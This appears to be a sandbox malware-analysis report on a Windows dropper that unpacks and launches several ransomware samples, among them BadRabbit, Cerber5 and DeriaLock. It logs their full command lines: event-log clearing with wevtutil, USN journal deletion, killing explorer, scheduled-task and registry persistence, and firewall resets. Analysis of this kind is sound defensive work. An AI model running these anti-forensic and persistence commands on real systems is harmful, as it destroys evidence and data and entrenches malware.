Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\5753.tmp "C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928}	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B7CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,

3_2_007B7CC5

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")

Source: C:\Users\user\Desktop\irH9zMhZub.exe

File created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Code function: 19_2_0040AAFB GetDiskFreeSpaceExW,StrFormatByteSizeW,StrFormatByteSizeW,StrFormatByteSizeW,

19_2_0040AAFB

Source: irH9zMhZub.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B84EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

3_2_007B84EE

Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4688:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5632:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\885E71293AD6FDE5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6056:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Mutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{91C2E618-4AEF-670B-529B-DA298DEF0C96}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2392:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_01

Source: C:\Users\user\Desktop\irH9zMhZub.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\irH9zMhZub.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: irH9zMhZub.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: irH9zMhZub.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe.0.dr
Source:	Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe.0.dr
Source:	Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000002C.00000000.315487934.0000000000DD2000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr
Source:	Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 19.2.Endermanch@Cerber5.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 40.2.Endermanch@Cerber5.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 58.2.Endermanch@Cerber5.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 19.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 40.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 58.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040D4D8 push esi; ret	19_2_0040D4E8
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040D233 pushad ; retf	19_2_0040D23B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040C2E5 pushad ; ret	19_2_0040C31B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B68F push ecx; ret	19_2_0040B69F
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040CF0B push 01377B4Eh; retf	19_2_0040CF11
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_01570730 push edx; ret	19_2_01570824
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0154635E push ecx; ret	19_2_0154635F
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_01545AD5 push ecx; ret	19_2_01545AE1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0154554D push esi; ret	19_2_01545568
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0154350D push dword ptr [edi+ecx*4-75h]; iretd	19_2_01543513
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_015425F5 push ecx; ret	19_2_0154267E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_01544593 push esi; ret	19_2_01544595
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_01540FD0 push 0000000Fh; iretd	19_2_01540FDC
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_015427DF push C25EA208h; ret	19_2_015427F8
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_01540FC7 push 0000000Fh; iretd	19_2_01540FDC
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_015427F9 push C25EA208h; ret	19_2_015427F8
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_01542648 push ecx; ret	19_2_0154267E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_015466E0 push edx; ret	19_2_015466E1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_015426B1 push eax; ret	19_2_015426B2
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040D4D8 push esi; ret	40_2_0040D4E8
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040D233 pushad ; retf	40_2_0040D23B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040C2E5 pushad ; ret	40_2_0040C31B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B68F push ecx; ret	40_2_0040B69F
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040CF0B push 01377B4Eh; retf	40_2_0040CF11
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04DA0730 push edx; ret	40_2_04DA0824
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04D725F5 push ecx; ret	40_2_04D7267E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04D74593 push esi; ret	40_2_04D74595
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04D7554D push esi; ret	40_2_04D75568
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04D7350D push dword ptr [edi+ecx*4-75h]; iretd	40_2_04D73513
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04D766E0 push edx; ret	40_2_04D766E1
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_04D726B1 push eax; ret	40_2_04D726B2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,

3_2_007B9016

Source: irH9zMhZub.exe	Static PE information: real checksum: 0x0 should be: 0x2c1fa
Source: Endermanch@Krotten.exe.0.dr	Static PE information: real checksum: 0x13aae should be: 0xee00
Source: Endermanch@DeriaLock.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x82848
Source: Endermanch@InfinityCrypt.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x3cd67
Source: Endermanch@Birele.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x22594
Source: Endermanch@NoMoreRansom.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1624e8
Source: Fantom.exe.0.dr	Static PE information: real checksum: 0x23bfb should be: 0x42811

Source: initial sample	Static PE information: section name: .text entropy: 7.963291049609408
Source: initial sample	Static PE information: section name: .text entropy: 7.3467930766155956

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\rundll32.exe

Executable created and started: C:\Windows\5753.tmp

Jump to behavior

Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Fantom.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\cscc.dat	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	File created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\dispci.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\cscc.dat			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\dispci.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe

Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_007B9534

Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
